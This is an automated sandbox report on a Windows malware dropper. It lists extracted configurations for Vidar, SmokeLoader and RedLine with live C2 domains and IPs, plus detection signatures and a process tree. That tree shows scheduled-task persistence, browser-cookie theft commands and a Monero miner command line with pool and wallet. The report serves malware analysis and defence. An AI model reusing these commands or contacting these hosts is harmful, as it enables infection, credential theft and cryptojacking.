Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1822s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-07-2021 21:22

General

  • Target

    8 (2).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

1k_TEST

C2

86.106.181.209:18845

Extracted

Family

redline

Botnet

NEW_5k

C2

86.106.181.209:18845

Extracted

Family

vidar

Version

39.8

Botnet

865

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • suricata: ET MALWARE Win32/Kelihos.F exe Download 2
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 29 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • autoit_exe 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 27 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:344
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1412
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2796
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2776
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Browser
            1⤵
              PID:2672
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2488
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2468
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                  1⤵
                  • Modifies registry class
                  PID:1904
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1356
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1268
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1080
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:936
                        • C:\ProgramData\Provisioning\settings.exe
                          C:\ProgramData\Provisioning\settings.exe
                          2⤵
                            PID:4116
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                              3⤵
                              • Creates scheduled task(s)
                              PID:4944
                          • C:\Users\Admin\AppData\Roaming\vbaevah
                            C:\Users\Admin\AppData\Roaming\vbaevah
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4804
                            • C:\Users\Admin\AppData\Roaming\vbaevah
                              C:\Users\Admin\AppData\Roaming\vbaevah
                              3⤵
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: MapViewOfSection
                              PID:4600
                          • C:\Users\Admin\AppData\Roaming\rjaevah
                            C:\Users\Admin\AppData\Roaming\rjaevah
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:5756
                          • C:\ProgramData\Provisioning\settings.exe
                            C:\ProgramData\Provisioning\settings.exe
                            2⤵
                              PID:5168
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                3⤵
                                • Creates scheduled task(s)
                                PID:4632
                            • C:\ProgramData\Provisioning\settings.exe
                              C:\ProgramData\Provisioning\settings.exe
                              2⤵
                                PID:3772
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                  3⤵
                                  • Creates scheduled task(s)
                                  PID:3848
                              • C:\Users\Admin\AppData\Roaming\rjaevah
                                C:\Users\Admin\AppData\Roaming\rjaevah
                                2⤵
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:4840
                              • C:\Users\Admin\AppData\Roaming\vbaevah
                                C:\Users\Admin\AppData\Roaming\vbaevah
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:5916
                                • C:\Users\Admin\AppData\Roaming\vbaevah
                                  C:\Users\Admin\AppData\Roaming\vbaevah
                                  3⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  PID:3808
                              • C:\ProgramData\Provisioning\settings.exe
                                C:\ProgramData\Provisioning\settings.exe
                                2⤵
                                  PID:4572
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                    3⤵
                                    • Creates scheduled task(s)
                                    PID:4136
                                • C:\ProgramData\Provisioning\settings.exe
                                  C:\ProgramData\Provisioning\settings.exe
                                  2⤵
                                    PID:6084
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /f /sc MINUTE /mo 5 /RL LIMITED /tn UDMR /tr "'C:\ProgramData\Provisioning\settings.exe'"
                                      3⤵
                                      • Creates scheduled task(s)
                                      PID:6080
                                  • C:\Users\Admin\AppData\Roaming\rjaevah
                                    C:\Users\Admin\AppData\Roaming\rjaevah
                                    2⤵
                                    • Loads dropped DLL
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:3920
                                  • C:\Users\Admin\AppData\Roaming\vbaevah
                                    C:\Users\Admin\AppData\Roaming\vbaevah
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:1924
                                    • C:\Users\Admin\AppData\Roaming\vbaevah
                                      C:\Users\Admin\AppData\Roaming\vbaevah
                                      3⤵
                                      • Checks SCSI registry key(s)
                                      PID:2428
                                • C:\Users\Admin\AppData\Local\Temp\8 (2).exe
                                  "C:\Users\Admin\AppData\Local\Temp\8 (2).exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3952
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:1536
                                    • C:\Users\Admin\AppData\Local\Temp\7zS00603894\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS00603894\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:3652
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:932
                                        • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.exe
                                          sonia_1.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of WriteProcessMemory
                                          PID:3368
                                          • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_1.exe" -a
                                            6⤵
                                            • Executes dropped EXE
                                            PID:3468
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2284
                                        • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_3.exe
                                          sonia_3.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Modifies system certificate store
                                          PID:2196
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 928
                                            6⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4700
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:988
                                        • C:\Users\Admin\AppData\Local\Temp\7zS00603894\sonia_5.exe
                                          sonia_5.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:3488
                                          • C:\Users\Admin\Documents\ZVk3P_POJPfinpuBmIwQFmYm.exe
                                            "C:\Users\Admin\Documents\ZVk3P_POJPfinpuBmIwQFmYm.exe"
                                            6⤵
                                              PID:5004
                                              • C:\Users\Admin\Documents\ZVk3P_POJPfinpuBmIwQFmYm.exe
                                                C:\Users\Admin\Documents\ZVk3P_POJPfinpuBmIwQFmYm.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4100
                                            • C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe
                                              "C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4980
                                              • C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe
                                                C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe
                                                7⤵
                                                  PID:4504
                                                • C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe
                                                  C:\Users\Admin\Documents\cSeT12yWlDBgfFj0nB600z6k.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5172
                                              • C:\Users\Admin\Documents\iaA8TufAIOkBPW18jjl8E8vb.exe
                                                "C:\Users\Admin\Documents\iaA8TufAIOkBPW18jjl8E8vb.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4972
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5740
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:2940
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:1236
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                      PID:1672
                                                  • C:\Users\Admin\Documents\KEECatS0Vn1l2VqgZB6xhIOs.exe
                                                    "C:\Users\Admin\Documents\KEECatS0Vn1l2VqgZB6xhIOs.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:4964
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                      7⤵
                                                        PID:5208
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                          8⤵
                                                          • Creates scheduled task(s)
                                                          PID:4268
                                                      • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:5628
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                          8⤵
                                                            PID:5556
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                              9⤵
                                                              • Creates scheduled task(s)
                                                              PID:6140
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:1716
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                            8⤵
                                                              PID:4916
                                                        • C:\Users\Admin\Documents\y5zMY9b9kbOhPCDfdngH6Eb4.exe
                                                          "C:\Users\Admin\Documents\y5zMY9b9kbOhPCDfdngH6Eb4.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4940
                                                          • C:\Users\Admin\Documents\y5zMY9b9kbOhPCDfdngH6Eb4.exe
                                                            "C:\Users\Admin\Documents\y5zMY9b9kbOhPCDfdngH6Eb4.exe"
                                                            7⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:3876
                                                        • C:\Users\Admin\Documents\sSnk5KUQrRmt14tnZzwLmlui.exe
                                                          "C:\Users\Admin\Documents\sSnk5KUQrRmt14tnZzwLmlui.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:4932
                                                        • C:\Users\Admin\Documents\YmMBQ7cMGSpwBgZiPdAJwYAO.exe
                                                          "C:\Users\Admin\Documents\YmMBQ7cMGSpwBgZiPdAJwYAO.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4920
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                            7⤵
                                                              PID:4156
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im chrome.exe
                                                                8⤵
                                                                • Kills process with taskkill
                                                                PID:5668
                                                          • C:\Users\Admin\Documents\6CHHMOesneNljByijtqFXlec.exe
                                                            "C:\Users\Admin\Documents\6CHHMOesneNljByijtqFXlec.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4892
                                                          • C:\Users\Admin\Documents\0a7TfvoVH2lejQT5Q4jTOo1d.exe
                                                            "C:\Users\Admin\Documents\0a7TfvoVH2lejQT5Q4jTOo1d.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            PID:4880
                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5904
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5464
                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5188
                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                8⤵
                                                                  PID:5804
                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                  8⤵
                                                                    PID:6020
                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Program Files directory
                                                                  PID:5924
                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:5944
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:1000
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:4152
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                      PID:5912
                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                      8⤵
                                                                        PID:3524
                                                                  • C:\Users\Admin\Documents\h_1Dob9Z3BDxvHulG1fBRCoh.exe
                                                                    "C:\Users\Admin\Documents\h_1Dob9Z3BDxvHulG1fBRCoh.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4872
                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                      7⤵
                                                                        PID:5040
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:5828
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        PID:5540
                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                        7⤵
                                                                          PID:3880
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5676
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4412
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4532
                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:4312
                                                                      • C:\Users\Admin\Documents\9E_OlJB8Yd5puGfo_XlnBvDM.exe
                                                                        "C:\Users\Admin\Documents\9E_OlJB8Yd5puGfo_XlnBvDM.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4864
                                                                        • C:\Users\Admin\Documents\9E_OlJB8Yd5puGfo_XlnBvDM.exe
                                                                          "C:\Users\Admin\Documents\9E_OlJB8Yd5puGfo_XlnBvDM.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Checks SCSI registry key(s)
                                                                          • Suspicious behavior: MapViewOfSection
                                                                          PID:5428
                                                                      • C:\Users\Admin\Documents\BD9QP0fnQTryZz7rAW4h4Lri.exe
                                                                        "C:\Users\Admin\Documents\BD9QP0fnQTryZz7rAW4h4Lri.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:4856
                                                                        • C:\Users\Public\run.exe
                                                                          C:\Users\Public\run.exe
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3992
                                                                          • C:\Users\Public\run.exe
                                                                            C:\Users\Public\run.exe
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:5680
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                              9⤵
                                                                                PID:4512
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /T 10 /NOBREAK
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:4504
                                                                        • C:\Users\Admin\Documents\JBjyPZM8LjJbFIhb4QKt2SOn.exe
                                                                          "C:\Users\Admin\Documents\JBjyPZM8LjJbFIhb4QKt2SOn.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4848
                                                                          • C:\Users\Admin\Documents\JBjyPZM8LjJbFIhb4QKt2SOn.exe
                                                                            C:\Users\Admin\Documents\JBjyPZM8LjJbFIhb4QKt2SOn.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
